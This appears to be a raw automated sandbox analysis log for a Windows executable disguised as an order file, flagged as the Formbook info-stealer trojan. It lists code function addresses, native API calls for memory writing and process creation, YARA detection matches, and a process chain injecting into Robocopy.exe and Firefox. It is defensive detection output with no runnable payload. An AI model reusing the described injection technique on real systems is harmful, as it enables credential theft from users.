Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32C10 NtOpenProcess,	5_2_04A32C10
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32DC0 NtAdjustPrivilegesToken,	5_2_04A32DC0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32D50 NtWriteVirtualMemory,	5_2_04A32D50
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32EB0 NtProtectVirtualMemory,	5_2_04A32EB0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32E80 NtCreateProcessEx,	5_2_04A32E80
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32EC0 NtQuerySection,	5_2_04A32EC0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32FB0 NtSetValueKey,	5_2_04A32FB0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32F30 NtOpenDirectoryObject,	5_2_04A32F30
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A329D0 NtWaitForSingleObject,	5_2_04A329D0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32AA0 NtQueryInformationFile,	5_2_04A32AA0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32BE0 NtQueryVirtualMemory,	5_2_04A32BE0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A32B20 NtQueryInformationProcess,	5_2_04A32B20
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1EFDA NtQueryInformationProcess,NtReadVirtualMemory,	5_2_04D1EFDA
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1F99A NtClose,	5_2_04D1F99A

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Code function: 0_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352F

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

File created: C:\Windows\resources\0409

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 0_2_6F8A1BFF	0_2_6F8A1BFF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352AA526	3_2_352AA526
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529F5C9	3_2_3529F5C9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352975C6	3_2_352975C6
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E2760	3_2_351E2760
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EA760	3_2_351EA760
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35296757	3_2_35296757
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527D62C	3_2_3527D62C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FC600	3_2_351FC600
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35204670	3_2_35204670
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528D646	3_2_3528D646
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0680	3_2_351E0680
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352536EC	3_2_352536EC
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529F6F6	3_2_3529F6F6
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DC6E0	3_2_351DC6E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF113	3_2_351CF113
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527D130	3_2_3527D130
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352A010E	3_2_352A010E
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3522717A	3_2_3522717A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E51C0	3_2_351E51C0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FB1E0	3_2_351FB1E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528E076	3_2_3528E076
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D00A0	3_2_351D00A0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EB0D0	3_2_351EB0D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352970F1	3_2_352970F1
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EE310	3_2_351EE310
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529F330	3_2_3529F330
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D1380	3_2_351D1380
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CD2EC	3_2_351CD2EC
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529FD27	3_2_3529FD27
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DAD00	3_2_351DAD00
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35297D4C	3_2_35297D4C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0D69	3_2_351E0D69
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2DB0	3_2_351F2DB0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E9DD0	3_2_351E9DD0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527FDF4	3_2_3527FDF4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D0C12	3_2_351D0C12
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EAC20	3_2_351EAC20
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35296C69	3_2_35296C69
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529EC60	3_2_3529EC60
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528EC4C	3_2_3528EC4C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E3C60	3_2_351E3C60
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35279C98	3_2_35279C98
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F8CDF	3_2_351F8CDF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352AACEB	3_2_352AACEB
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FFCE0	3_2_351FFCE0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351ECF00	3_2_351ECF00
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529FF63	3_2_3529FF63
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529EFBF	3_2_3529EFBF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35291FC6	3_2_35291FC6
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E6FE0	3_2_351E6FE0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35280E6D	3_2_35280E6D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35200E50	3_2_35200E50
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35290EAD	3_2_35290EAD
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E1EB2	3_2_351E1EB2
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D2EE8	3_2_351D2EE8
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35299ED2	3_2_35299ED2
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529E9A6	3_2_3529E9A6
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DE9A0	3_2_351DE9A0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35280835	3_2_35280835
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E3800	3_2_351E3800
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529F872	3_2_3529F872
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E9870	3_2_351E9870
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FB870	3_2_351FB870
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C6868	3_2_351C6868
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352598B2	3_2_352598B2
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F6882	3_2_351F6882
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352978F3	3_2_352978F3
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E28C0	3_2_351E28C0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A00445	5_2_04A00445
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABF5C9	5_2_04ABF5C9
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB75C6	5_2_04AB75C6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ACA526	5_2_04ACA526
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A00680	5_2_04A00680
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A736EC	5_2_04A736EC
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABF6F6	5_2_04ABF6F6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049FC6E0	5_2_049FC6E0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A9D62C	5_2_04A9D62C
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A1C600	5_2_04A1C600
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A24670	5_2_04A24670
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AAD646	5_2_04AAD646
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A02760	5_2_04A02760
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A0A760	5_2_04A0A760
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB6757	5_2_04AB6757
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049F00A0	5_2_049F00A0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB70F1	5_2_04AB70F1
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A0B0D0	5_2_04A0B0D0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AAE076	5_2_04AAE076
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A1B1E0	5_2_04A1B1E0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A051C0	5_2_04A051C0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049EF113	5_2_049EF113
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A9D130	5_2_04A9D130
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AC010E	5_2_04AC010E
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A4717A	5_2_04A4717A
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049ED2EC	5_2_049ED2EC
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049F1380	5_2_049F1380
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABF330	5_2_04ABF330
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A0E310	5_2_04A0E310
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A99C98	5_2_04A99C98
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A1FCE0	5_2_04A1FCE0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ACACEB	5_2_04ACACEB
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A18CDF	5_2_04A18CDF
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A0AC20	5_2_04A0AC20
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049F0C12	5_2_049F0C12
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A03C60	5_2_04A03C60
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB6C69	5_2_04AB6C69
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABEC60	5_2_04ABEC60
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AAEC4C	5_2_04AAEC4C
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A12DB0	5_2_04A12DB0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A9FDF4	5_2_04A9FDF4
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A09DD0	5_2_04A09DD0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABFD27	5_2_04ABFD27
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049FAD00	5_2_049FAD00
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A00D69	5_2_04A00D69
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB7D4C	5_2_04AB7D4C
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB0EAD	5_2_04AB0EAD
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A01EB2	5_2_04A01EB2
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049F2EE8	5_2_049F2EE8
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB9ED2	5_2_04AB9ED2
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AA0E6D	5_2_04AA0E6D
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A20E50	5_2_04A20E50
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABEFBF	5_2_04ABEFBF
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A06FE0	5_2_04A06FE0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB1FC6	5_2_04AB1FC6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A0CF00	5_2_04A0CF00
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABFF63	5_2_04ABFF63
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A798B2	5_2_04A798B2
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A16882	5_2_04A16882
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AB78F3	5_2_04AB78F3
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A028C0	5_2_04A028C0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04AA0835	5_2_04AA0835
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A03800	5_2_04A03800
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A09870	5_2_04A09870
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A1B870	5_2_04A1B870
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABF872	5_2_04ABF872
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049E6868	5_2_049E6868
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABE9A6	5_2_04ABE9A6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049FE9A0	5_2_049FE9A0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A1FAA0	5_2_04A1FAA0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABFA89	5_2_04ABFA89
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABCA13	5_2_04ABCA13
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABEA5B	5_2_04ABEA5B
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A74BC0	5_2_04A74BC0
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04ABFB2E	5_2_04ABFB2E
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04A00B10	5_2_04A00B10
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1EFDA	5_2_04D1EFDA
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1E424	5_2_04D1E424
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1E7BC	5_2_04D1E7BC
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1D828	5_2_04D1D828
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1E305	5_2_04D1E305

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: String function: 3525EF10 appears 95 times
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: String function: 351CB910 appears 227 times
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: String function: 3524E692 appears 77 times
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: String function: 35227BE4 appears 72 times
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: String function: 04A6E692 appears 84 times
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: String function: 04A47BE4 appears 87 times
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: String function: 04A7EF10 appears 105 times
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: String function: 04A35050 appears 35 times
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: String function: 049EB910 appears 266 times

Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853915425.000000000507A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamerobocopy.exej% vs IMG_00991ORDER_FILES.exe
Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.0000000035470000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
Source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000035121000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe
Source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034F6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs IMG_00991ORDER_FILES.exe

Source: IMG_00991ORDER_FILES.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/14@21/13

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

0_2_0040352F

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

File created: C:\Users\user\AppData\Local\Temp\nss26EA.tmp

Source: IMG_00991ORDER_FILES.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: IMG_00991ORDER_FILES.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

File read: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Source: unknown	Process created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
Source: C:\Windows\SysWOW64\Robocopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process created: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wintypes.dll	Jump to behavior
